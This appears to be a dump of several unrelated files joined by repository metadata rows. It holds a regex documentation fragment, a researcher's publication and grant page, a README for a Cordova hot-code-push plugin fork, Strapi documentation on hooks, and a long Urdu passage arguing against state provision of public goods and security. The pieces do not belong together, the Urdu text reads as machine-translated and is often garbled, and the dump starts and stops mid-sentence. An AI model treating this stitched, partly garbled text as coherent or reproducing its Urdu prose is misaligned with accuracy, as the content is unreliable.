- `\s` — Any whitespace character. Equivalent to `[\f\n\r\t\v\x85\p{Z}]` unless in ECMAScript-compliant mode, in which case `\s` is equivalent to `[ \f\n\r\t\v]`.
- `\S` — Any non-whitespace character. Equivalent to `[^\f\n\r\t\v\x85\p{Z}]` unless in ECMAScript-compliant mode, in which case `\s` is equivalent to `[^ \f\n\r\t\v]`.
| 75.722222 | 199 | 0.680117 | eng_Latn | 0.90045 |
972ac3263bcbae0ed7f79f2437f279d04c5c36db | 6,637 | md | Markdown | research.md | bhpark0/bhpark0.github.io | f0f187528043e915a7202a2e88cff2a49a53bea7 | [
"MIT"
] | null | null | null | research.md | bhpark0/bhpark0.github.io | f0f187528043e915a7202a2e88cff2a49a53bea7 | [
"MIT"
] | null | null | null | research.md | bhpark0/bhpark0.github.io | f0f187528043e915a7202a2e88cff2a49a53bea7 | [
"MIT"
] | null | null | null | ---
layout: page
permalink: /research/
---
#### <center>Statistical Modeling of Human Neuroimaging data</center>
<img src="/images/topic1.jpg" style="width: 1000px;"/><br>
##### Related Articles & Publications
* Yong Hyuk Cho, Heirim Lee, Na-Rae Kim, Jin Wook Choi, Hyun Woong Roh, Jae Ho Ha, Chang Hyung Hong, Sang Won Seo, Seong Hye Choi, Eun-Joo Kim, Byeong C. Kim, Seong Yoon Kim, Jaeyoun Cheong, Bumhee Park*, Sang Joon Son. Cortical thickness is differently associated with ALDH2 rs671 polymorphism according to level of amyloid deposition. Scientific Reports. 2021, September, 11(19529).
<br>
* Tae-Hyeong Kim, Eunhye Choi, Hayeon Kim, Shin-Young Kim, Yeeun Kim, Bung-Nyun Kim, Subin Park, Kyu-In Jung, Bumhee Park*, Min-Hyeon Park. The association between hippocampal volume and level of attention in children and adolescents. Frontiers in Systems Neuroscience. 2021, August; 15(671735).
<br>
* Dajung Sung, Bumhee Park†, Min-Hyeon Park, Bora Kim, Hayeon Kim, Kyu-In Jung, Seung-Yup Lee, Bung-Nyun Kim and Subin Park. Gray Matter Volume in the Developing Frontal Lobe and Its Relationship with Executive Function in Late Childhood and Adolescence: a community-based study. Frontiers in Psychiatry, 2021, July; 12(686174).
<br>
* Dajung Sung, Bumhee Park, Shin-Young Kim, Bung-Nyun Kim, Subin Park, Kyu-In Jung, Jungjin Kim, Min-Hyeon Park (2020). Structural Alterations in Large-scale Brain networks and their Relationship with Sleep Disturbances in the Adolescent population. Scientific Reports, 10(1), 1-9.
<br>
* Sang Joon Son, Bumhee Park, Jin Wook Choi, Hyun Woong Roh, Na-Rae Kim, Jae Eun Sin, Haena Kim, Hyun Kook Lim, Chang Hyung Hong (2019). Psychological Resilience Enhances the Orbitofrontal Network in the Elderly With Mild Cognitive Impairment. Frontiers in Psychiatry, 10, 615.
<br>
* Bumhee Park, Jose A. Palomares, Mary A. Woo, Daniel W. Kang, Paul M. Macey, Frisca L. Yan-Go, Ronald M. Harper, Rajesh Kumar (2016). Aberrant insular functional network integrity in patients with obstructive sleep apnea. Sleep, 39(5), 989-1000.
<br>
##### Related Grants
* 기초의과학연구센터사업(MRC), 한국연구재단; The National Research Foundation of Korea (NRF) grant funded by the Korea government (Ministry of Science and ICT) (NRF-2019R1A5A2026045) (2019.6-2026.2)
<br>
* 혁신형바이오뱅킹사업, 질병관리청; Biobank Innovations for chronic Cerebrovascular disease Wth ALZheimer's disease Study (BICWALZS), funded by the Korea Disease Control and Prevention Agency (KDCA) (2021.3-2025.12)
<br>
* 중견교원 교내 학술진흥연구비, 아주대병원; The intramural research fund of Ajou University Medical Center. (2020.10 - 2022.9)
<br>
* 중견연구자지원사업, 한국연구재단; The National Research Foundation of Korea (NRF) grant funded by the Korea government (Ministry of Science and ICT) (NRF-2022R1A2C1005967). (2022.3 - 2025.2)
*
---
#### <center>Network Modeling of Psychiatry, Psychological and Biomedical data</center>
<img src="/images/topic2.jpg" style="width: 1000px;"/><br>
##### Related Articles & Publications
* Eunyoung Lee, Helmet Karim, Carmen Andreescu, Akiko Mizuno, Howard Aizenstein, Heirim Lee, Dongyun Lee, Kyungmin Lee, Sun-Mi Cho, Doyeop Kim, Rae Woong Park, Sang Joon Son, Bumhee Park*. Network modeling of anxiety and psychological characteristics on suicidal behavior: Cross-sectional study. _Journal of Affective Disorders_. 2022, February, 299, 545-552.
<br>
* Min Ho An, Soon Sang Park, Seng Chan You, Rae Woong Park, Bumhee Park, Hyung Kyoo Woo, Han Ki Kim, Sang Joon Son (2019). Depressive symptom network associated with comorbid anxiety in late-life depression. Frontiers in psychiatry, 10, 856.
<br>
* Bumhee Park, Jinseok Eo and Hae-Jeong Park (2017). Structural brain connectivity constrains within-a-day variability of direct functional connectivity. Frontiers in human neuroscience, 11, 408.
<br>
* Bumhee Park, Jose A. Palomares, Mary A. Woo, Daniel W. Kang, Paul M. Macey, Frisca L. Yan-Go, Ronald M. Harper, Rajesh Kumar (2016). Aberrant insular functional network integrity in patients with obstructive sleep apnea. Sleep, 39(5), 989-1000.
<br>
* Bumhee Park, Jose A. Palomares, Mary A. Woo, Daniel W. Kang, Paul M. Macey, Frisca L. Yan‐Go, Ronald M. Harper, Rajesh Kumar (2016). Disrupted functional brain network organization in patients with obstructive sleep apnea. Brain and behavior, 6(3), e00441.
<br>
* Bumhee Park, Dae-Shik Kim, Hae-Jeong Park (2014). Graph independent component analysis reveals repertoires of intrinsic network components in the human brain. PloS one, 9(1), e82873.
<br>
##### Related Grants
* 기초의과학연구센터사업(MRC), 한국연구재단; The National Research Foundation of Korea (NRF) grant funded by the Korea government (Ministry of Science and ICT) (NRF-2019R1A5A2026045) (2019.6-2026.2)
<br>
* 중견교원 교내 학술진흥연구비, 아주대병원; The intramural research fund of Ajou University Medical Center. (2020.10 - 2022.9)
---
#### <center>Psychiatric/Psychological research with (standardized) Real-World Data</center>
<img src="/images/topic3.jpg" style="width: 1000px;"/><br>
##### Related Articles & Publications
* Eunyoung Lee, Helmet Karim, Carmen Andreescu, Akiko Mizuno, Howard Aizenstein, Heirim Lee, Dongyun Lee, Kyungmin Lee, Sun-Mi Cho, Doyeop Kim, Rae Woong Park, Sang Joon Son, Bumhee Park*. Network modeling of anxiety and psychological characteristics on suicidal behavior: Cross-sectional study. _Journal of Affective Disorders_. 2022, February, 299, 545-552.
<br>
* Yong Hyuk Cho, Eunyoung Lee, Eun Sil Her, Gyubeom Hwang, Ki-Young Lim, Jai Sung Noh, Yunmi Shin, Chang Hyung Hong, Hyun Woong Roh, Dongyun Lee, Heirim Lee, Doyeop Kim, Rae Woong Park, Bumhee Park , Sang Joon Son. Association between suicide risk and comorbidity of mood disorder and alcohol use disorder: Using common data model in Psychiatry. Journal of Korean Neuropsychiatric Association. 2021 Aug;60(3):232-239.
<br>
* Dongyun Lee, Jaehyeong Cho, Seng Chan, You, Rae Woong Park, Chungsoo Kim, Eunyoung Lee, Bumhee Park, Sang-Joon Son. Risk of mortality in elderly COVID-19 patients with mental health disorders: a nationwide retrospective study in South Korea. _American Journal of Geriatric Psychiatry_, 2020, _Accepted_.
<br>
* Jae Ho Ha, Eunyoung Lee, Dongyun Lee, Yong Hyuk Cho, Heirim Lee, Bumhee Park, Sang Joon Son. Suicidal Risk in Depresssed Patients with the Treatment by Antipsychotics and Antidepressant Compared to Antidepressant Monotherapy: A Pilot Study Using Psychiatric Common Data Model. _Journal of Korean Neuropsychiatric Association_, 2020, _Accepted_.
<br>
##### Related Grants
* The Korean Health Industry Development Institute (KHIDI) , funded by the Ministry of Health & Welfare, Republic of Korea (HI19C0094) (2019.4-2021.12)
<br>
| 79.011905 | 417 | 0.764502 | eng_Latn | 0.538521 |
972adc2bc7228181e22a385e640a264b236294cf | 5,926 | md | Markdown | README.md | ap1969/cordova-hot-code-push | bcb2c8d61da60ad2fb28f5f37aac3310a8fe8dfd | [
"MIT"
] | null | null | null | README.md | ap1969/cordova-hot-code-push | bcb2c8d61da60ad2fb28f5f37aac3310a8fe8dfd | [
"MIT"
] | null | null | null | README.md | ap1969/cordova-hot-code-push | bcb2c8d61da60ad2fb28f5f37aac3310a8fe8dfd | [
"MIT"
] | null | null | null | # THIS PROJECT IS A WORK IN PROGRESS
Given the news that Microsoft is shutting down their app-center hot code push service, the only real option left is Ionic Appflow, which is expensive for indy developers: $2500 up-front (you have to pay for a year in advance). Yes, they are a business and have to make a profit, but I think there's scope for an alternative option.
This is the start of that option.
Do not use it yet, as I've not yet published any updates other than this page.
# ALL THE NOTES BELOW ARE FROM THE ORIGINAL NORDNET PROJECT!
We are not using this repo anymore, and we lack the manpower and the experience needed to maintain it. We are aware of the inconveniece that this may cause you. Feel free to use it as is, or create your own fork. See https://github.com/nordnet/cordova-hot-code-push/issues/371 for more information.
# Cordova Hot Code Push Plugin
This plugin provides functionality to perform automatic updates of the web based content in your application. Basically, everything that is stored in `www` folder of your Cordova project can be updated using this plugin.
When you publish your application on the store - you pack in it all your web content: html files, JavaScript code, images and so on. There are two ways how you can update it:
1. Publish new version of the app on the store. But it takes time, especially with the App Store.
2. Sacrifice the offline feature and load all the pages online. But as soon as Internet connection goes down - application won't work.
This plugin is intended to fix all that. When user starts the app for the first time - it copies all the web files onto the external storage. From this moment all pages are loaded from the external folder and not from the packed bundle. On every launch plugin connects to your server (with optional authentication, see fetchUpdate() below) and checks if the new version of web project is available for download. If so - it loads it on the device and installs on the next launch.
As a result, your application receives updates of the web content as soon as possible, and still can work in offline mode. Also, plugin allows you to specify dependency between the web release and the native version to make sure, that new release will work on the older versions of the application.
**Is it fine with App Store?** Yes, it is... as long as your content corresponds to what application is intended for and you don't ask user to click some button to update the web content. For more details please refer to [this wiki page](https://github.com/nordnet/cordova-hot-code-push/wiki/App-Store-FAQ).
## Supported platforms
- Android 4.0.0 or above.
- iOS 7.0 or above. Xcode 7 is required.
### Installation
This requires cordova 5.0+ (current stable 1.5.3)
```sh
cordova plugin add cordova-hot-code-push-plugin
```
It is also possible to install via repo url directly (**unstable**)
```sh
cordova plugin add https://github.com/nordnet/cordova-hot-code-push.git
```
At the end of the installation plugin will recommend you to install [Cordova Hot Code Push CLI client](https://github.com/nordnet/cordova-hot-code-push-cli). This client will help you to:
- easily generate necessary configuration files;
- launch local server to listen for any changes in the web project and deploy new version immediately on the app.
Of course, you can use this plugin without the CLI client, but it will make your life easier.
### Quick start guide
In this guide we will show how quickly you can test this plugin and start using it for development. For that we will install [development add-on](https://github.com/nordnet/cordova-hot-code-push/wiki/Local-Development-Plugin).
1. Create new Cordova project using command line interface and add iOS/Android platforms:
```sh
cordova create TestProject com.example.testproject TestProject
cd ./TestProject
cordova platform add android
cordova platform add ios
```
Or use the existing one.
2. Add plugin:
```sh
cordova plugin add cordova-hot-code-push-plugin
```
3. Add plugin for local development:
```sh
cordova plugin add cordova-hot-code-push-local-dev-addon
```
4. Install Cordova Hot Code Push CLI client:
```sh
npm install -g cordova-hot-code-push-cli
```
5. Start local server by executing:
```sh
cordova-hcp server
```
As a result you will see something like this:
```
Running server
Checking: /Cordova/TestProject/www
local_url http://localhost:31284
Warning: .chcpignore does not exist.
Build 2015.09.02-10.17.48 created in /Cordova/TestProject/www
cordova-hcp local server available at: http://localhost:31284
cordova-hcp public server available at: https://5027caf9.ngrok.com
```
6. Open new console window, go to the project root and launch the app:
```sh
cordova run
```
Wait until application is launched for both platforms.
7. Now open your `index.html` page in `www` folder of the `TestProject`, change something in it and save. In a few seconds you will see updated page on the launched devices (emulators).
From this point you can do local development, where all the changes are uploaded on the devices without the need to restart applications on every change you made.
For production build do not forget to add the following to your `config.xml` file as it is a required property. Checkout the [wiki](https://github.com/nordnet/cordova-hot-code-push/wiki/Cordova-config-preferences) for more information:
```xml
<chcp>
<config-file url="https://5027caf9.ngrok.com/chcp.json"/>
</chcp>
```
### Documentation
All documentation can be found in details in our [Wiki on GitHub](https://github.com/nordnet/cordova-hot-code-push/wiki).
If you have some questions/problems/suggestions - don't hesitate to post a [thread](https://github.com/nordnet/cordova-hot-code-push/issues). If it's an actual issue - please, follow [this guide](https://github.com/nordnet/cordova-hot-code-push/wiki/Issue-creation-guide) on how to do that properly.
| 45.584615 | 478 | 0.769322 | eng_Latn | 0.990524 |
972ade67f013e2982e7a4dbf21cf1727667c2809 | 3,262 | md | Markdown | docs/3.x.x/en/advanced/hooks.md | ainpoenya/strapi | ab62e943c5c1cc3319e627532229277700b030e5 | [
"MIT"
] | 1 | 2018-07-12T15:40:41.000Z | 2018-07-12T15:40:41.000Z | docs/3.x.x/en/advanced/hooks.md | akkys77/strapi | 12ee30ae929e6183656ba2fee888ce931dfa5291 | [
"MIT"
] | null | null | null | docs/3.x.x/en/advanced/hooks.md | akkys77/strapi | 12ee30ae929e6183656ba2fee888ce931dfa5291 | [
"MIT"
] | 1 | 2018-08-21T08:10:31.000Z | 2018-08-21T08:10:31.000Z | # Hooks
The hooks are modules that add functionality to the core. They are loaded during the server boot. For example, if your project needs to work with a SQL database, your will have to add the hook `strapi-bookshelf` to be able to connect your app with your database.
**Path —** `./hooks/documentation/lib/index.js`.
```js
const fs = require('fs');
const path = require('path');
module.exports = strapi => {
const hook = {
/**
* Default options
*/
defaults: {
documentation: {
path: '/public/documentation'
}
},
/**
* Initialize the hook
*/
initialize: cb => {
try {
// Check if documentation folder exist.
fs.accessSync(path.resolve(process.cwd(), this.defaults.documentation.path));
} catch (e) {
// Otherwise, create the folder.
fs.mkdirSync(path.resolve(process.cwd(), this.defaults.documentation.path));
}
// This function doesn't really exist,
// it's just an example to tell you that you
// run your business logic and when it's done
// you just need to call the callback `cb`
generateDocumentation(path.resolve(process.cwd(), this.defaults.documentation.path), function(err) {
if (err) {
// Error: it will display the error to the user
// and the hook won't be loaded.
return cb(err);
}
// Success.
cb();
});
}
};
return hook;
};
```
- `defaults` (object): Contains the defaults configurations. This object is merged to `strapi.config.hook.settings.**`.
- `initialize` (function): Called during the server boot. The callback `cb` needs to be called. Otherwise, the hook won't be loaded.
Every folder that follows this name pattern `strapi-*` in your `./node_modules` folder will be loaded as a hook. The hooks are accessible through the `strapi.hook` variable.
## Structure
A hook needs to follow the structure below:
```
/hook
└─── lib
- index.js
- LICENSE.md
- package.json
- README.md
```
The `index.js` is the entry point to your hook. It should look like the example above.
## Dependencies
It happens that a hook has a dependency to another one. For example, the `strapi-bookshelf` has a dependency to `strapi-knex`. Without it, the `strapi-bookshelf` can't work correctly. It also means that the `strapi-knex` hook has to be loaded before.
To handle this case, you need to update the `package.json` at the root of your hook.
```json
{
"name": "strapi-bookshelf",
"version": "x.x.x",
"description": "Bookshelf hook for the Strapi framework",
"dependencies": {
...
},
"strapi": {
"dependencies": [
"strapi-knex"
]
}
}
```
## Custom hooks
The framework allows to load hooks from the project directly without having to install them from npm. It's great way to take advantage of the features of the hooks system for code that doesn't need to be shared between apps. To achieve this, you have to create a `./hooks` folder at the root of your project and put the hooks into it.
```
/project
└─── admin
└─── api
└─── config
└─── hooks
│ └─── strapi-documentation
│ └─── strapi-server-side-rendering
└─── plugins
└─── public
- favicon.ico
- package.json
- server.js
```
| 27.880342 | 334 | 0.6542 | eng_Latn | 0.992392 |
972af12e9058972b5b2c3232fc45a88ebb4af589 | 24,814 | md | Markdown | ur-PK/Economics and Ethics of Private Property Studies in Political Economy and Philosophy/03_p01_ch01_02.md | engrbrain1/from-en | 15407c49bde9081800920eed873f883f2cb2602d | [
"MIT"
] | null | null | null | ur-PK/Economics and Ethics of Private Property Studies in Political Economy and Philosophy/03_p01_ch01_02.md | engrbrain1/from-en | 15407c49bde9081800920eed873f883f2cb2602d | [
"MIT"
] | null | null | null | ur-PK/Economics and Ethics of Private Property Studies in Political Economy and Philosophy/03_p01_ch01_02.md | engrbrain1/from-en | 15407c49bde9081800920eed873f883f2cb2602d | [
"MIT"
] | null | null | null | لیکن عام سامان کے اصول صرف اس وجہ سے غیر معقول اخلاقی استدلال کی وجہ سے نہیں ٹوٹتے. یہاں تک کہ اعلی مفادات، معاشی استدلال کی مندرجہ بالا بحث میں موجود افادی غلط ہے. جیسے عوامی اجناس کا قیاص یہ کہتا ہے کہ، یہ بہتر ہوگا کہ عوامی اجناس کو چھوڈ نے کے بجائے انہیں رکھ لینا بہتر ہوگا، اگرچہ اس بات کو بھولنا نہیں چاہیے کہ اس سے پہلے کسی وجہ کا موجود ہونا ضروری نہیں ( جو عوامی اجناس کے قیاص کا خاتمہ بالکل یہاں پر کرے گا). اس کے لیے یہ واضح طور سے ممکن ہے، اور بے شک یہ اسے ایک حقیقت سے جانا جاتا ہے، کہ وہ انتشاری موجود ہیں جو مملکت کی حرکت سے شدید نفرت کرتے ہیں کہ وہ عوامی اجناس کو بالکل بھی نہ رکھنے کی ترجیع دیں گے بجانے اسکے کہ مملکت انہیں فراہم کرے.[^16] یہاں تک کہ اگر دلائل کے اعتراف کی صورت میں سرکار کی طرف سے عوامی اشیاء اگر مہیا ہو جائیں اس صورت میں یہ بیان کرنا ضروری ہے کہ انھیں مملکت کی طرف فراہم کردہ مگر دو ٹوک ہونا چاہیے, چونکہ یہ کسی بھی اعتبار سے وہ پسند نہیں ہے اسکے ساتھ جس کا مقابلہ فرد کرتا ہے. چونکہ پیسے یا کوئی یا دیگر وسائل کو ممکنہ متبادل استعمال کے طور نکالنا چاہتے تاکہ مبینہ عوامی سامان کی امداد کی جائے، ایک واحد اور مناسب سوال یہ ہے کہ دیگر وسائل سے نکالا گیا پیسہ کیا ہمیں عوامی اجناس پر اپنا پیسہ خرچ کرنا چاہیے یا نہیں (چنانچہ وہ سامان غیر سرکاری سامان جو ہم خرید سکتے تھے اب اس وجہ سے نہیں خرید سکتے کیونکہ اس کا استعمال عوامی اجناس کے لیے ہوا ہے) جو عوامی سامان سے زیادہ قیمتی اور زیادہ ضروری ہے. اور اس سوال کا جواب بالکل واضح ہے. صارفین کی تشخیص کے مطابق، چاہے اس کی سطح کتنی ہی اونچی کیوں نہ ہو، عوامی اجناس کی قیمت نجی سامان کے مقابلے میں کم ہے کیونکہ اگر صارفین پر یہ فیصلہ چھوڈا جاتا( اوروہ ان پہ کسی متبادل کا دباؤ نہ ڈالتے) وہ ظاہراً پیسے کا استعمال کسی دوسرے طریقے سے کرنا چاہے گیں ( ورنہ کسی بھی دباؤ کی ضرورت نہیں پڑتی. اس سے بغیر کسی شک کے یہ ثابت ہوتا ہے کہ جو وسائل عوام کی سہولت کے لیے رکھے جاتے ہیں وہ دراصل ضائع کیے جاتے ہیں کیونکہ وہ جو تمام وسائل اشیاء اور خدمات فراہم کرتے ہیں جو مشکل سے ثانوی اہمیت کے حامل ہوتے ہیں. مختصراً، اگر کوئی گمان کرتا کہ عوامی اجناس اور نجی املاک کے درمیان فرق واضح طور سے موجود ہے، اور اگر یہ بھی کہا جاتا کہ ایک عوامی جنس مفید ہو سکتا ہے، اس صورت میں سرکاری اجناس پھر بھی نجی اجناس کے ساتھ مقابلہ کر لیتے. اور یہ جاننے کے لیے صرف ایک ہی طریقہ ہے کہ آیاں یہ فوری طور پر مطلوب ہیں یا نہیں اور کس حد تک، یا*mutatis mutandis*،اگر، اور کس حد تک ان کی پیداوار کا انحصار فوری ضرورت کے حامل نجی املاک پر ہیں: اگر ہر ایک چیز مقابلہ والی غیر سرکاری اجننسیو سے مفت میں فراہم ہو جائے اس صورت میں. اس لیے، عوامی اجناس کے قیاص آراوں کے نتیجے تک پہنچنے کے برعکس منطق اس بات کو منوانے پر زور دیتا ہے کہ نظام کی حفاظت صرف خالص بازار ہیں، صارفین کے نظریہ سے، عوامی جنس کی پیداوار کا فیصلہ لینا. اور صرف ایک خالص سرمایہ دارانہ حکم کے تحت ایک یقینی فیصلہ لیا جاسکتا ہے کہ کتنی مقدار میں عوامی اجناس کو بنایا جائے ( بشرطیکہ یہ سب کے لیے تیار کیےجایے) یہی ایک عقلمند فیصلہ بھی ہوگا.[^17] ایک الگ نتیجے کے طور پر ابھرنے کے لیے واقعی Orwellian ابعاد کے ایک علم المعانی انقلاب سے کم نہ ہو گا. اگر کوئی کسی کی ہاں کو نا تصور کر لے اور اسے سچ میں مانتا ہوں "اور کسی چیز کو خریدنے سے انکار کرنا جسے وہ مانتا ہو کہ یہ وہ دوسری چیز کے نثبت بہتر ہے" کسی سے معاہدہ کرنے کا مطلب معاہدہ نا کرنا اور اسی طرح باقی سب، کیا عوامی اجناس کے قیاص آراوں کا نقطہ نظر سابت کیا جا سکتا ہے ”[^18] میں لیکن پھر یہ کیسے یقین کے ساتھ کہا جا سکتا ہے کہ جو وہ کہتے ہیں وہ صحیح ہے بجائے اسکے کہ جو وہ کہتے ہیں وہ اسکا متضاد ہیں، جو کہ دراصل ایک سادہ بکواس کے سوا کوئی معنی نہیں رکھتا? ہم نہیں کر سکتے. Murray N. Rothbard بالکل درست ہے کہ جب وہ عوامی اجناس کی موجودگی کو سابت کرنے کے لیے کوششیں کرنے والوں کی ناکامی پر تبصرہ کرتا ہے جو کہ عوامی اجناس کی کم پیداوار یا کم مقدار میں یا کم معیار کے مصنوعات بنانے کی وجہ سے ہوتا ہے. وہ لکھتے ہیں،
> [s]uch ایک نقطہ نظر مکمل طور پر اقتصادی سائنس کا دعوی ہونے کی آزاد منڈی عمل *کبھی* کافی ہے. یہ زیادہ سے زیادہ ہے، اقتصادیات کے زاتی اخلاقی خیالات سے نہیں، بلکہ، ان تمام افراد کے نقطہ نظر سے جو آزادانہ طور پر صارفین کی ضرورتوں کے موقف کی پاسداری کرتے ہیں. سرکاری دخل اندازی، لہٰذا، ہمیشہ ضروری طور پر *اس راستے * کی حد سے اکثر زیادہ سے زیادہ دور بھاگ جایے گا.[^19]
یقیناً، جن دلائل کو مبینہ طور پر مارکیٹ کی ناکامی ثابت کرنے کا زمہ دار ٹھہرایا جاتا ہے وہ چھوٹا اور نا معقول ہے. ان غیر مترقبہ تکنیکی شبدجال چھین لینا یہ ثابت کرتا ہے کہ": یہ شرائط کی کمی، اور بہت سارے اشیاء یا صرف پیدا کیے جاسکتےہو تو فراہم کردہ خدمات کی طرف سے نشان لگا دیا گیا پر عائد عدم جارحیت کے اصول کی طرف سے کہا جاتا ہے کہ طور پر ایک مارکیٹ کامل نہیں ہے جارحیت کی اجازت دی گی نہ ہو پیدا ہوتی ہے. بہت حد تک صحیح ہے، پر کوئی بھی مارکیٹ قیاص آراں اسے مسترد کرنے کی ہمت نہیں کر سکتا. پھر بھی،اور نتیجہ خیز ہونے کے باوجود بھی بازار کی ناکاری کا تحفظ اخلاقی اور اقتصادی طور پر کیا جا سکتا ہے، بازار کی تکمیل کے لئے فرض کیے جانے والے عوامی اجناس کے قیاص آراں نہیں پھیلا سکتے[^20] یہ بھی صحیح ہے کہ عوامی اجناس کو فراہم کرنے کے موجودہ عمل کو نکالنے کے لیے موجودہ سماجی ڈھانچے اور مال و دولت کی تقسیم میں تبدیلیاں لانا پڈے گی. ایسی تبدیلیاں بے شک لوگوں کی مشکلات کا اضالہ لائیے گی. بلکہ، یہ با قاعدہ طور پر دور تک پھیلے ہوئے عوامی تعرض کو ریاست کی غیر سرکاری پالیسیوں کو عملانے کے لیے اس کے باوجود کہ سماجی دولت کو اس سے بڈھاوا مل سکے. یقیناً، تاہم، اس حقیقت کو درست حجت کے طور پرتسلیم نہیں کیا جا سکتا جو کہ بازار کی ناکامی کو بیان کر سکے. اگر ایک شخص کو دوسرے لوگوں کے سر پر مارنے کی اجازت دی جائے اور اس عمل کو مسلسل کرنے کی اجازت دی جائے، وہ یقینی طور پر چوٹل ہوگا. لیکن کوئی بھی پرانے (سخت) اصولوں کو شاید ہی جایز عزر کے طور پر قبول کریں. اسے تکلیف پہنچتی ہے، اور بے لیکن اس کو تکلیف دینے سے سماج میں موجود ہر ایک فرد کو یہ تعین کرنے کا حق مل جاتا ہے کہ کون سی چیز کتنی مقدار میں بنایی جائے، ایسے نظام کے لیے جہاں صارفین کو یہ حق ہو کہ وہ یہ تعین کر سکے کہ دوسرے صارفین کو رضاکارانہ طور پر منصفانہ سلوک خریدنے کی اجازت دی جائے. یقیناً، اس طرح کا ایک متبادل صارفین کے نقطہ نظر سے رضاکارانہ صارفین پر قابل ترجیح ہوگا.
منطقی استدلال کی قوت سے، ہمیں صارفین کے خاطر Molinari کے نتائج کو اپنا لینا چاہیے، تمام سامان اور خدمات بازار سے فراہم ہونی چاہیے.[^21] یہ نہ صرف ایک جھوٹ ہے کہ واضح طور پر الگ اشیاء موجود ہیں، جو کچھ خصوصی ترامیم کو جو کہ عام مقالہ سرمایہ دارانہ نظام کی اقتصادی برتری کو سر انجام دے سکے؛ یہاں تک کہ اگر وہ موجود بھی ہوں، اس کی کوئی خاص وجہ نہیں ملتی کہ کیوں کچھ سرکاری اجناس کو غیر سرکاری تنظیموں کے زریعے نہیں بنایا جاسکتا, چونکہ یہ مستقل طور پر نجی سامان کے مقابلہ میں کھڈے ہیں. دراصل، عوامی اجناس کے قیاص آراوں کے انتظام نشر و اشاعت کے باوجود، بازاروں کی زیادہ افادیت ریاست کے مقابلے میں تیزی کے ساتھ مبینہ طور پر عوامی اجناس کا احترام بڈھ رہا ہے. روز مرہ کے تجربات سامنے ہونے کے باوجود، کوئی بھی اس بات کی طرف سنجیدہ نہیں ہے کہ ہمارے روز مرہ کی ضروریات، جیسے کہ ڈاک خدمات، ریل سڈکیں، بجلی، ٹیلی-فون، تعلیم، پیسہ، سڈکیں اور وغیرہ موثر طور پر مملکت سے زیادہ فراہم کرتی ہین، یعنی، صارفین کی ترجیحات کے ساتھ. ابھی بھی لوگ عام طور پر ایک مخصوص شعبے میں، کس منطق کو قبول کرنے سے دور تیز کترانے لگیں: سیکورٹی کی پیداوار میں. اس لیے, اس باب کے دیگر حصے میں میری توجہ کمخصوص علاقے میں سرمایہ دارانہ معیشت کے کام کاج کی وضاحت کرنے پر ہوگی—ایک برتری جس کا منطقی کیس پہلے سے ہی اب تک بنایا گیا ہو، لیکن اس کو زیادہ قائل بنانے کے لیے ایک بار کچھ تجرباتی مواد کا تجزیہ کرنا چاہتے اور یہ اس کے اپنے حق میں ایک مسئلہ کے طور پر تعلیم حاصل کی ہے ۔[^22]
ایک نونمانپولسٹک، مسابقانہ پیداواری کی سیکورٹی کا نظام کس طرح کام کرے گا? یہ پہلے سے ہی واضح ہونا چاہیے کہ اس سوال کا جواب دینا منطقی تجزیہ کے دایرے سےخالص ہونا چاہیے، عوامی اجناس کے قیاص کو بیان کرنے کے لیے اپوڈکٹ کردار کو بیان کرنے کا فقدان ہے. عام طور پر سامنے آنے والی مشکلات مارکیٹ ہیم پیداوار کی مشکلات حل کرنے کے لیے ملتا جلتا ہے، خصوصاً اگر اس حد تک ہیم کو مملکت کی طرف سے تیار کیا گیا ہو، لہذا کوئی بھی ماضی کے تجربات نہیں کھینچ سکتا. صرف آزمایشی جوابات تیار کیے جا سکتے ہیں. ممکنہ طور پر کوئی بھی hamburger کا حقیقی ڈھانچہ نہیں جان سکتا_کہ کتنی مقابلہ کرنے والی کمپنیاں وجود میں آئیں گی اور ان کی دوسری کمپنیوں کے مقابلے میں کیا اہمیت ہوگی، ہیم برگرز کس طرح کے ہونگے، مانگ میں کمی کی وجہ سے بازار میں کتنے اقسام کے ہیم برگرز غائب ہو نگے اور اور بھی. کوئی بھی ان تمام تبدیلیوں اور حالات کو نہیں جان سکتا جن کی وجہ سے ہیم صنعت کی ساخت پر اثر پڈے _مختلف صارفین کے گرہوں کی مانگ میں تبدیلی، تکنیک میں تبدیلی، مختلف اجناس کی قیمتوں میں تبدیلی سے صنعت پر بالواسطہ یا بلا واسطہ اثر پڈے گا، اور اور بھی. اس بات پر زور دینا ضروری ہے کہ نجی پیداوار کی سلامتی پر مشابہ مسائل اٹھتے ہیں، اس کا قطعی طور پر یہ مطلب نہیں ہے کہ کچھ بھی فیصلہ کن نہیں کہا جا سکتا. سلامتی کی سہولیات کے لیے کچھ خاص شرائط کو قبول کرنا ( وہ شرائط جو کم و بیش دنیا کی حقیقت کی عکاسی کرتے ہیں) کیا کچھ کیااور کہا جا سکتا ہے کہ کیسے سلامتی کی پیداوار کے مختلف سماجی قوانین کے تحت کام کرنے کے لیے مختلف ساختی رکاوٹوں کا کسی دوسرے طریقے سے جواب طلب کرے گا.[^23] مجھے پہلے اندازہ کرنے دیں اس معاملے کے کم از کم ایک نتیجے تک پہنچنے کے لیے وسیع علامات لانے کی ضرورت ہے اور پھر اس نظام کا موازنہ اس سے کیا جائے گا اس سے کیا نتایج نکلے گیں اگر انہیں nonmonopolistic سے بدلا جائے.
یہاں تک کہ اگر سیکورٹی کو ایک عوامی سامان سمجھا جاتا ہے، قلیل وسائل کو تعین کرنے کے لیے انہیں دوسرے اجناس سے مقابلہ کرنا ہوگا. جو کچھ سیکورٹی پر خرچ ہوتا ہے اب اسے دوسرے اجناس کے لیے استعمال نہیں کیا جا سکتا جو کہ صارفین کے اطمنان کو بڈھا سکتے ہیں. اس کے علاوہ، سیکورٹی نہ صرف ایک یکساں سامان ہے، بلکہ یہ متعدد اجزاء اور پہلوؤں پر مشتمل ہے. اس سے نہ صرف جرائم کی روک تھام ہوگی، مجرموں کی کھوج، اور قانون کو عملانا، بلکہ یہاں چوروں سے، قدرتی آفات، پالیوٹرس اور وغیرہ وغیرہ سے بچنے کے لیے بھی سیکورٹی ہے. اس کے علاوہ، سکیورٹی کو ایک گانٹھ میں بنایا نہیں جاتا بلکہ مختم درجے کے یونٹس میں تقسیم کیا جاسکتا ہے. اس کے علاوہ، مختلف لوگ مجموعی طور پر سکیورٹی کی اہمیت کو مختلف طور پر منسلک کرتے ہیں اور پورے سامان کے مختلف خصوصیات کے ساتھ، جس کا انحصار ان کی زاتی خصوصیات کے مختلف پہلوؤں کواپنے ماضی کے عدم تحفظ کا احساس اور وہ وقت جس میں وہ زندہ رہتے ہیں[^24] یہاں پر میں نایاب وسائل کو مقرر 